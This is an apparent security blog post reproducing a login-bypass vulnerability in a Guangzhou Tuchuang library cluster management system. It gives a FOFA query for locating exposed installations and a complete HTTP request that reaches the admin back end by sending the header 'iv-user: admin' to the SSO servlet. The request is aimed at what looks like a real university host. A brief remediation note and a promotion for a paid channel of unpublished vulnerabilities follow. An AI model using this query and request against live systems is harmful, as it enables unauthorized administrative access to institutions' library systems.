导读
主要分享学习日常中的web渗透,内网渗透、漏洞复现、工具开发相关等。希望以技术共享、交流等不断赋能自己,为网络安全发展贡献自己的微薄之力!
广州图创计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过,攻击者可通过此漏洞登录后台,从而造成不良影响。
1、fofa
title=="系统登陆" && body="广州图创计算机软件开发有限公司"
2、部分界面如下
3、在sso登录接口/interlib/common/SSOServlet 添加header头部信息iv-user: admin 即可绕过登录
GET /interlib/common/SSOServlet? HTTP/1.1
Host: remlib.git.edu.cn
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=A1489EB9461FD2644677045DC6025098
iv-user: admin
Connection: close
1、修改验证逻辑,如是否登录成功服务器端返回一个参数,但是到此就是最终验证,不需要再对返回的参数进行使用并作为登录是否成功的最终判断依据!
因为很多未公开或者小范围公开的漏洞不能直接发公众号,所以后面部分漏洞会直接整理发表在知识大陆,持续更新,目前进入需要9.9元。(收费主要是想参与freebuf知识大陆活动),持续更新中,链接如下:
https://wiki.freebuf.com/front/societyFront?invitation_code=2f34044b&society_id=107&source_data=2
加入帮会后扫描二维码加入群聊,(有问题后台留言)。
京信通信系统中国有限公司CPE-WiFi存在任意用户添加&命令执行
泛微e-office OfficeServer2.php 存在任意文件读取漏洞复现
原文始发于微信公众号(非攻安全实验室):广州图创计算机软件开发有限公司图书馆集群管理系统存在逻辑绕过